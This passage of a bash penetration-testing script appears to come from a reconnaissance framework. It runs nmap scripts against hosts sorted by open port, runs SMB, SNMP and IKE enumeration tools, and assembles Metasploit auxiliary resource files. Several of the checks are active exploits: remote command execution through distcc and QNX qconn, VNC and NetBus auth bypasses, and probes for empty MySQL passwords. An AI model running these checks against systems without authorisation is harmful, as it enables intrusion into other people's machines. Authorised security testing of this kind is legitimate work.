nmap -iL $name/2049.txt -Pn -n --open -p2049 --script-timeout 1m --script=nfs-ls,nfs-showmount,nfs-statfs --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-2049.txt
fi
if [[ -e $name/2202.txt ]]; then
echo " ACARS"
nmap -iL $name/2202.txt -Pn -n --open -p2202 --script-timeout 1m --script=acarsd-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-2202.txt
fi
if [[ -e $name/2302.txt ]]; then
echo " Freelancer"
nmap -iL $name/2302.txt -Pn -n -sU --open -p2302 --script-timeout 1m --script=freelancer-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-2302.txt
fi
if [[ -e $name/2375.txt ]]; then
echo " Docker"
nmap -iL $name/2375.txt -Pn -n --open -p2375 --script-timeout 1m --script=docker-version --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-2375.txt
fi
if [[ -e $name/2628.txt ]]; then
echo " DICT"
nmap -iL $name/2628.txt -Pn -n --open -p2628 --script-timeout 1m --script=dict-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-2628.txt
fi
if [[ -e $name/2947.txt ]]; then
echo " GPS"
nmap -iL $name/2947.txt -Pn -n --open -p2947 --script-timeout 1m --script=gpsd-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-2947.txt
fi
if [[ -e $name/3031.txt ]]; then
echo " Apple Remote Event"
nmap -iL $name/3031.txt -Pn -n --open -p3031 --script-timeout 1m --script=eppc-enum-processes --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-3031.txt
fi
if [[ -e $name/3260.txt ]]; then
echo " iSCSI"
nmap -iL $name/3260.txt -Pn -n --open -p3260 --script-timeout 1m --script=iscsi-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-3260.txt
fi
if [[ -e $name/3306.txt ]]; then
echo " MySQL"
nmap -iL $name/3306.txt -Pn -n --open -p3306 --script-timeout 1m --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-3306.txt
fi
if [[ -e $name/3310.txt ]]; then
echo " ClamAV"
nmap -iL $name/3310.txt -Pn -n --open -p3310 --script-timeout 1m --script=clamav-exec --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 > $name/script-3310.txt
fi
if [[ -e $name/3389.txt ]]; then
echo " Remote Desktop"
nmap -iL $name/3389.txt -Pn -n --open -p3389 --script-timeout 1m --script=rdp-vuln-ms12-020,rdp-enum-encryption --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
egrep -v '(attackers|Description|Disclosure|http|References|Risk factor)' tmp4 > $name/script-3389.txt
fi
if [[ -e $name/3478.txt ]]; then
echo " STUN"
nmap -iL $name/3478.txt -Pn -n -sU --open -p3478 --script-timeout 1m --script=stun-version --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-3478.txt
fi
if [[ -e $name/3632.txt ]]; then
echo " Distributed Compiler Daemon"
nmap -iL $name/3632.txt -Pn -n --open -p3632 --script-timeout 1m --script=distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'" --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
egrep -v '(IDs|Risk factor|Description|Allows|earlier|Disclosure|Extra|References|http)' tmp4 > $name/script-3632.txt
fi
if [[ -e $name/3671.txt ]]; then
echo " KNX gateway"
nmap -iL $name/3671.txt -Pn -n -sU --open -p3671 --script-timeout 1m --script=knx-gateway-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-3671.txt
fi
if [[ -e $name/4369.txt ]]; then
echo " Erlang Port Mapper"
nmap -iL $name/4369.txt -Pn -n --open -p4369 --script-timeout 1m --script=epmd-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-4369.txt
fi
if [[ -e $name/5019.txt ]]; then
echo " Versant"
nmap -iL $name/5019.txt -Pn -n --open -p5019 --script-timeout 1m --script=versant-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-5019.txt
fi
if [[ -e $name/5060.txt ]]; then
echo " SIP"
nmap -iL $name/5060.txt -Pn -n --open -p5060 --script-timeout 1m --script=sip-enum-users,sip-methods --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-5060.txt
fi
if [[ -e $name/5353.txt ]]; then
echo " DNS Service Discovery"
nmap -iL $name/5353.txt -Pn -n -sU --open -p5353 --script-timeout 1m --script=dns-service-discovery --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-5353.txt
fi
if [[ -e $name/5666.txt ]]; then
echo " Nagios"
nmap -iL $name/5666.txt -Pn -n --open -p5666 --script-timeout 1m --script=nrpe-enum --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-5666.txt
fi
if [[ -e $name/5672.txt ]]; then
echo " AMQP"
nmap -iL $name/5672.txt -Pn -n --open -p5672 --script-timeout 1m --script=amqp-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-5672.txt
fi
if [[ -e $name/5683.txt ]]; then
echo " CoAP"
nmap -iL $name/5683.txt -Pn -n -sU --open -p5683 --script-timeout 1m --script=coap-resources --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-5683.txt
fi
if [[ -e $name/5850.txt ]]; then
echo " OpenLookup"
nmap -iL $name/5850.txt -Pn -n --open -p5850 --script-timeout 1m --script=openlookup-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-5850.txt
fi
if [[ -e $name/5900.txt ]]; then
echo " VNC"
nmap -iL $name/5900.txt -Pn -n --open -p5900 --script-timeout 1m --script=realvnc-auth-bypass,vnc-info,vnc-title --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-5900.txt
fi
if [[ -e $name/5984.txt ]]; then
echo " CouchDB"
nmap -iL $name/5984.txt -Pn -n --open -p5984 --script-timeout 1m --script=couchdb-databases,couchdb-stats --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-5984.txt
fi
if [[ -e $name/x11.txt ]]; then
echo " X11"
nmap -iL $name/x11.txt -Pn -n --open -p6000-6005 --script-timeout 1m --script=x11-access --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-x11.txt
fi
if [[ -e $name/6379.txt ]]; then
echo " Redis"
nmap -iL $name/6379.txt -Pn -n --open -p6379 --script-timeout 1m --script=redis-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-6379.txt
fi
if [[ -e $name/6481.txt ]]; then
echo " Sun Service Tags"
nmap -iL $name/6481.txt -Pn -n -sU --open -p6481 --script-timeout 1m --script=servicetags --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-6481.txt
fi
if [[ -e $name/6666.txt ]]; then
echo " Voldemort"
nmap -iL $name/6666.txt -Pn -n --open -p6666 --script-timeout 1m --script=voldemort-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-6666.txt
fi
if [[ -e $name/7210.txt ]]; then
echo " Max DB"
nmap -iL $name/7210.txt -Pn -n --open -p7210 --script-timeout 1m --script=maxdb-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-7210.txt
fi
if [[ -e $name/7634.txt ]]; then
echo " Hard Disk Info"
nmap -iL $name/7634.txt -Pn -n --open -p7634 --script-timeout 1m --script=hddtemp-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-7634.txt
fi
if [[ -e $name/8000.txt ]]; then
echo " QNX QCONN"
nmap -iL $name/8000.txt -Pn -n --open -p8000 --script-timeout 1m --script=qconn-exec --script-args=qconn-exec.timeout=60,qconn-exec.bytes=1024,qconn-exec.cmd="uname -a" --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-8000.txt
fi
if [[ -e $name/8009.txt ]]; then
echo " AJP"
nmap -iL $name/8009.txt -Pn -n --open -p8009 --script-timeout 1m --script=ajp-methods,ajp-request --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-8009.txt
fi
if [[ -e $name/8081.txt ]]; then
echo " McAfee ePO"
nmap -iL $name/8081.txt -Pn -n --open -p8081 --script-timeout 1m --script=mcafee-epo-agent --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-8081.txt
fi
if [[ -e $name/8091.txt ]]; then
echo " CouchBase Web Administration"
nmap -iL $name/8091.txt -Pn -n --open -p8091 --script-timeout 1m --script=membase-http-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-8091.txt
fi
if [[ -e $name/8140.txt ]]; then
echo " Puppet"
nmap -iL $name/8140.txt -Pn -n --open -p8140 --script-timeout 1m --script=puppet-naivesigning --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-8140.txt
fi
if [[ -e $name/bitcoin.txt ]]; then
echo " Bitcoin"
nmap -iL $name/bitcoin.txt -Pn -n --open -p8332,8333 --script-timeout 1m --script=bitcoin-getaddr,bitcoin-info,bitcoinrpc-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-bitcoin.txt
fi
if [[ -e $name/9100.txt ]]; then
echo " Lexmark"
nmap -iL $name/9100.txt -Pn -n --open -p9100 --script-timeout 1m --script=lexmark-config --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-9100.txt
fi
if [[ -e $name/9160.txt ]]; then
echo " Cassandra"
nmap -iL $name/9160.txt -Pn -n --open -p9160 --script-timeout 1m --script=cassandra-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-9160.txt
fi
if [[ -e $name/9600.txt ]]; then
echo " FINS"
nmap -iL $name/9600.txt -Pn -n --open -p9600 --script-timeout 1m --script=omron-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-9600.txt
fi
if [[ -e $name/9999.txt ]]; then
echo " Java Debug Wire Protocol"
nmap -iL $name/9999.txt -Pn -n --open -p9999 --script-timeout 1m --script=jdwp-version --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-9999.txt
fi
if [[ -e $name/10000.txt ]]; then
echo " Network Data Management"
nmap -iL $name/10000.txt -Pn -n --open -p10000 --script-timeout 1m --script=ndmp-fs-info,ndmp-version --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-10000.txt
fi
if [[ -e $name/11211.txt ]]; then
echo " Memory Object Caching"
nmap -iL $name/11211.txt -Pn -n --open -p11211 --script-timeout 1m --script=memcached-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-11211.txt
fi
if [[ -e $name/12000.txt ]]; then
echo " CCcam"
nmap -iL $name/12000.txt -Pn -n --open -p12000 --script-timeout 1m --script=cccam-version --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-12000.txt
fi
if [[ -e $name/12345.txt ]]; then
echo " NetBus"
nmap -iL $name/12345.txt -Pn -n --open -p12345 --script-timeout 1m --script=netbus-auth-bypass,netbus-version --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-12345.txt
fi
if [[ -e $name/17185.txt ]]; then
echo " VxWorks"
nmap -iL $name/17185.txt -Pn -n -sU --open -p17185 --script-timeout 1m --script=wdb-version --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-17185.txt
fi
if [[ -e $name/19150.txt ]]; then
echo " GKRellM"
nmap -iL $name/19150.txt -Pn -n --open -p19150 --script-timeout 1m --script=gkrellm-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-19150.txt
fi
if [[ -e $name/27017.txt ]]; then
echo " MongoDB"
nmap -iL $name/27017.txt -Pn -n --open -p27017 --script-timeout 1m --script=mongodb-databases,mongodb-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-27017.txt
fi
if [[ -e $name/31337.txt ]]; then
echo " BackOrifice"
nmap -iL $name/31337.txt -Pn -n -sU --open -p31337 --script-timeout 1m --script=backorifice-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-31337.txt
fi
if [[ -e $name/35871.txt ]]; then
echo " Flume"
nmap -iL $name/35871.txt -Pn -n --open -p35871 --script-timeout 1m --script=flume-master-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-35871.txt
fi
if [[ -e $name/44818.txt ]]; then
echo " EtherNet/IP"
nmap -iL $name/44818.txt -Pn -n -sU --open -p44818 --script-timeout 1m --script=enip-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-44818.txt
fi
if [[ -e $name/47808.txt ]]; then
echo " BACNet"
nmap -iL $name/47808.txt -Pn -n -sU --open -p47808 --script-timeout 1m --script=bacnet-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-47808.txt
fi
if [[ -e $name/49152.txt ]]; then
echo " Supermicro"
nmap -iL $name/49152.txt -Pn -n --open -p49152 --script-timeout 1m --script=supermicro-ipmi-conf --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-49152.txt
fi
if [[ -e $name/50000.txt ]]; then
echo " DRDA"
nmap -iL $name/50000.txt -Pn -n --open -p50000 --script-timeout 1m --script=drda-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-50000.txt
fi
if [[ -e $name/hadoop.txt ]]; then
echo " Hadoop"
nmap -iL $name/hadoop.txt -Pn -n --open -p50030,50060,50070,50075,50090 --script-timeout 1m --script=hadoop-datanode-info,hadoop-jobtracker-info,hadoop-namenode-info,hadoop-secondary-namenode-info,hadoop-tasktracker-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-hadoop.txt
fi
if [[ -e $name/apache-hbase.txt ]]; then
echo " Apache HBase"
nmap -iL $name/apache-hbase.txt -Pn -n --open -p60010,60030 --script-timeout 1m --script=hbase-master-info,hbase-region-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-apache-hbase.txt
fi
rm tmp*
for x in $name/./script*; do
if grep '|' $x > /dev/null 2>&1; then
echo > /dev/null 2>&1
else
rm $x > /dev/null 2>&1
fi
done
##############################################################################################################
# Additional tools
if [[ -e $name/161.txt ]]; then
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt -i $name/161.txt > $name/onesixtyone.txt
fi
if [ -e $name/445.txt ] || [ -e $name/500.txt ]; then
echo
echo $medium
echo
echo -e "${BLUE}Running additional tools.${NC}"
fi
if [[ -e $name/445.txt ]]; then
echo " enum4linux"
for i in $(cat $name/445.txt); do
enum4linux -a $i | egrep -v "(Can't determine|enum4linux|Looking up status|No printers|No reply from|unknown|[E])" > tmp
cat -s tmp >> $name/script-enum4linux.txt
done
fi
if [[ -e $name/445.txt ]]; then
echo " smbclient"
for i in $(cat $name/445.txt); do
echo $i >> $name/script-smbclient.txt
smbclient -L $i -N | grep -v 'failed' >> $name/script-smbclient.txt 2>/dev/null
echo >> $name/script-smbclient.txt
done
fi
if [[ -e $name/500.txt ]]; then
echo " ike-scan"
for i in $(cat $name/445.txt); do
ike-scan -f $i >> $name/script-ike-scan.txt
done
fi
rm tmp 2>/dev/null
}
##############################################################################################################
f_metasploit(){
echo
echo $medium
echo
echo -ne "${YELLOW}Run matching Metasploit auxiliaries? (y/N) ${NC}"
read msf
if [ "$msf" == "y" ]; then
f_run-metasploit
else
f_report
fi
}
##############################################################################################################
f_run-metasploit(){
echo
echo -e "${BLUE}Starting Postgres.${NC}"
service postgresql start
echo
echo -e "${BLUE}Starting Metasploit.${NC}"
echo
echo -e "${BLUE}Using the following resource files.${NC}"
cp -R $discover/resource/ /tmp/
echo workspace -a $name > /tmp/master
echo spool tmpmsf > /tmp/master
if [[ -e $name/19.txt ]]; then
echo " Chargen Probe Utility"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/19.txt|g" /tmp/resource/19-chargen.rc
cat /tmp/resource/19-chargen.rc >> /tmp/master
fi
if [[ -e $name/21.txt ]]; then
echo " FTP"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/21.txt|g" /tmp/resource/21-ftp.rc
cat /tmp/resource/21-ftp.rc >> /tmp/master
fi
if [[ -e $name/22.txt ]]; then
echo " SSH"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/22.txt|g" /tmp/resource/22-ssh.rc
cat /tmp/resource/22-ssh.rc >> /tmp/master
fi
if [[ -e $name/23.txt ]]; then
echo " Telnet"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/23.txt|g" /tmp/resource/23-telnet.rc
cat /tmp/resource/23-telnet.rc >> /tmp/master
fi
if [[ -e $name/25.txt ]]; then
echo " SMTP"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/25.txt|g" /tmp/resource/25-smtp.rc
cat /tmp/resource/25-smtp.rc >> /tmp/master
fi
if [[ -e $name/69.txt ]]; then
echo " TFTP"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/69.txt|g" /tmp/resource/69-tftp.rc
cat /tmp/resource/69-tftp.rc >> /tmp/master
fi
if [[ -e $name/79.txt ]]; then
echo " Finger"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/79.txt|g" /tmp/resource/79-finger.rc
cat /tmp/resource/79-finger.rc >> /tmp/master
fi
if [[ -e $name/110.txt ]]; then
echo " POP3"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/110.txt|g" /tmp/resource/110-pop3.rc
cat /tmp/resource/110-pop3.rc >> /tmp/master
fi
if [[ -e $name/111.txt ]]; then
echo " RPC"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/111.txt|g" /tmp/resource/111-rpc.rc
cat /tmp/resource/111-rpc.rc >> /tmp/master
fi
if [[ -e $name/123.txt ]]; then
echo " NTP"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/123.txt|g" /tmp/resource/123-udp-ntp.rc
cat /tmp/resource/123-udp-ntp.rc >> /tmp/master
fi
if [[ -e $name/135.txt ]]; then
echo " DCE/RPC"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/135.txt|g" /tmp/resource/135-dcerpc.rc
cat /tmp/resource/135-dcerpc.rc >> /tmp/master
fi
if [[ -e $name/137.txt ]]; then
echo " NetBIOS"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/137.txt|g" /tmp/resource/137-udp-netbios.rc
cat /tmp/resource/137-udp-netbios.rc >> /tmp/master
fi
if [[ -e $name/143.txt ]]; then
echo " IMAP"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/143.txt|g" /tmp/resource/143-imap.rc
cat /tmp/resource/143-imap.rc >> /tmp/master
fi
if [[ -e $name/161.txt ]]; then
echo " SNMP"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/161.txt|g" /tmp/resource/161-udp-snmp.rc
cat /tmp/resource/161-udp-snmp.rc >> /tmp/master
fi
if [[ -e $name/407.txt ]]; then
echo " Motorola"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/407.txt|g" /tmp/resource/407-udp-motorola.rc
cat /tmp/resource/407-udp-motorola.rc >> /tmp/master
fi
if [[ -e $name/443.txt ]]; then
echo " VMware"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/443.txt|g" /tmp/resource/443-vmware.rc
cat /tmp/resource/443-vmware.rc >> /tmp/master
fi
if [[ -e $name/445.txt ]]; then
echo " SMB"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/445.txt|g" /tmp/resource/445-smb.rc
cat /tmp/resource/445-smb.rc >> /tmp/master
fi
if [[ -e $name/465.txt ]]; then
echo " SMTP/S"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/465.txt|g" /tmp/resource/465-smtp.rc
cat /tmp/resource/465-smtp.rc >> /tmp/master
fi
if [[ -e $name/502.txt ]]; then
echo " SCADA Modbus Client Utility"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/502.txt|g" /tmp/resource/502-scada.rc
cat /tmp/resource/502-scada.rc >> /tmp/master
fi
if [[ -e $name/512.txt ]]; then
echo " Rexec"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/512.txt|g" /tmp/resource/512-rexec.rc
cat /tmp/resource/512-rexec.rc >> /tmp/master
fi
if [[ -e $name/513.txt ]]; then
echo " rlogin"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/513.txt|g" /tmp/resource/513-rlogin.rc
cat /tmp/resource/513-rlogin.rc >> /tmp/master
fi
if [[ -e $name/514.txt ]]; then
echo " rshell"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/514.txt|g" /tmp/resource/514-rshell.rc
cat /tmp/resource/514-rshell.rc >> /tmp/master
fi
if [[ -e $name/523.txt ]]; then
echo " db2"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/523.txt|g" /tmp/resource/523-udp-db2.rc
cat /tmp/resource/523-udp-db2.rc >> /tmp/master
fi
if [[ -e $name/548.txt ]]; then
echo " AFP"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/548.txt|g" /tmp/resource/548-afp.rc
cat /tmp/resource/548-afp.rc >> /tmp/master
fi
if [[ -e $name/623.txt ]]; then
echo " IPMI"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/623.txt|g" /tmp/resource/623-udp-ipmi.rc
cat /tmp/resource/623-udp-ipmi.rc >> /tmp/master
fi
if [[ -e $name/771.txt ]]; then
echo " SCADA Digi"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/771.txt|g" /tmp/resource/771-scada.rc
cat /tmp/resource/771-scada.rc >> /tmp/master
fi
if [[ -e $name/831.txt ]]; then
echo " EasyCafe Server Remote File Access"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/831.txt|g" /tmp/resource/831-easycafe.rc
cat /tmp/resource/831-easycafe.rc >> /tmp/master
fi
if [[ -e $name/902.txt ]]; then
echo " VMware"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/902.txt|g" /tmp/resource/902-vmware.rc
cat /tmp/resource/902-vmware.rc >> /tmp/master
fi
if [[ -e $name/998.txt ]]; then
echo " Novell ZENworks Configuration Management Preboot Service Remote File Access"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/998.txt|g" /tmp/resource/998-zenworks.rc
cat /tmp/resource/998-zenworks.rc >> /tmp/master
fi
if [[ -e $name/1099.txt ]]; then
echo " RMI Registery"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/1099.txt|g" /tmp/resource/1099-rmi.rc
cat /tmp/resource/1099-rmi.rc >> /tmp/master
fi
if [[ -e $name/1158.txt ]]; then
echo " Oracle"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/1158.txt|g" /tmp/resource/1158-oracle.rc
cat /tmp/resource/1158-oracle.rc >> /tmp/master
fi
if [[ -e $name/1433.txt ]]; then
echo " MS-SQL"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/1433.txt|g" /tmp/resource/1433-mssql.rc
cat /tmp/resource/1433-mssql.rc >> /tmp/master
fi
if [[ -e $name/1521.txt ]]; then
echo " Oracle"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/1521.txt|g" /tmp/resource/1521-oracle.rc
cat /tmp/resource/1521-oracle.rc >> /tmp/master
fi
if [[ -e $name/1604.txt ]]; then
echo " Citrix"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/1604.txt|g" /tmp/resource/1604-udp-citrix.rc
cat /tmp/resource/1604-udp-citrix.rc >> /tmp/master
fi
if [[ -e $name/1720.txt ]]; then
echo " H323"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/1720.txt|g" /tmp/resource/1720-h323.rc
cat /tmp/resource/1720-h323.rc >> /tmp/master
fi
if [[ -e $name/1900.txt ]]; then
echo " UPnP"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/1900.txt|g" /tmp/resource/1900-udp-upnp.rc
cat /tmp/resource/1900-udp-upnp.rc >> /tmp/master
fi
if [[ -e $name/2049.txt ]]; then
echo " NFS"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/2049.txt|g" /tmp/resource/2049-nfs.rc
cat /tmp/resource/2049-nfs.rc >> /tmp/master
fi
if [[ -e $name/2362.txt ]]; then
echo " SCADA Digi"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/2362.txt|g" /tmp/resource/2362-udp-scada.rc
cat /tmp/resource/2362-udp-scada.rc >> /tmp/master
fi
if [[ -e $name/3000.txt ]]; then
echo " EMC"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/3000.txt|g" /tmp/resource/3000-emc.rc
cat /tmp/resource/3000-emc.rc >> /tmp/master
fi
if [[ -e $name/3050.txt ]]; then
echo " Borland InterBase Services Manager Information"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/3050.txt|g" /tmp/resource/3050-borland.rc
cat /tmp/resource/3050-borland.rc >> /tmp/master
fi
if [[ -e $name/3306.txt ]]; then
echo " MySQL"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/3306.txt|g" /tmp/resource/3306-mysql.rc
cat /tmp/resource/3306-mysql.rc >> /tmp/master
fi
if [[ -e $name/3310.txt ]]; then
echo " ClamAV"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/3310.txt|g" /tmp/resource/3310-clamav.rc
cat /tmp/resource/3310-clamav.rc >> /tmp/master
fi
if [[ -e $name/3389.txt ]]; then
echo " RDP"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/3389.txt|g" /tmp/resource/3389-rdp.rc
cat /tmp/resource/3389-rdp.rc >> /tmp/master
fi
if [[ -e $name/3500.txt ]]; then
echo " EMC"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/3500.txt|g" /tmp/resource/3500-emc.rc
cat /tmp/resource/3500-emc.rc >> /tmp/master
fi
if [[ -e $name/4800.txt ]]; then
echo " Moxa"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/4800.txt|g" /tmp/resource/4800-udp-moxa.rc
cat /tmp/resource/4800-udp-moxa.rc >> /tmp/master
fi
if [[ -e $name/5000.txt ]]; then
echo " Satel"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/5000.txt|g" /tmp/resource/5000-satel.rc
cat /tmp/resource/5000-satel.rc >> /tmp/master
fi
if [[ -e $name/5040.txt ]]; then
echo " DCE/RPC"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/5040.txt|g" /tmp/resource/5040-dcerpc.rc
cat /tmp/resource/5040-dcerpc.rc >> /tmp/master
fi
if [[ -e $name/5060.txt ]]; then
echo " SIP UDP"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/5060.txt|g" /tmp/resource/5060-udp-sip.rc
cat /tmp/resource/5060-udp-sip.rc >> /tmp/master
fi
if [[ -e $name/5060-tcp.txt ]]; then
echo " SIP"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/5060-tcp.txt|g" /tmp/resource/5060-sip.rc
cat /tmp/resource/5060-sip.rc >> /tmp/master
fi
if [[ -e $name/5432.txt ]]; then
echo " Postgres"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/5432.txt|g" /tmp/resource/5432-postgres.rc
cat /tmp/resource/5432-postgres.rc >> /tmp/master
fi
if [[ -e $name/5560.txt ]]; then
echo " Oracle iSQL"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/5560.txt|g" /tmp/resource/5560-oracle.rc
cat /tmp/resource/5560-oracle.rc >> /tmp/master
fi
if [[ -e $name/5631.txt ]]; then
echo " pcAnywhere"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/5631.txt|g" /tmp/resource/5631-pcanywhere.rc
cat /tmp/resource/5631-pcanywhere.rc >> /tmp/master
fi
if [[ -e $name/5632.txt ]]; then
echo " pcAnywhere"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/5632.txt|g" /tmp/resource/5632-pcanywhere.rc
cat /tmp/resource/5632-pcanywhere.rc >> /tmp/master
fi
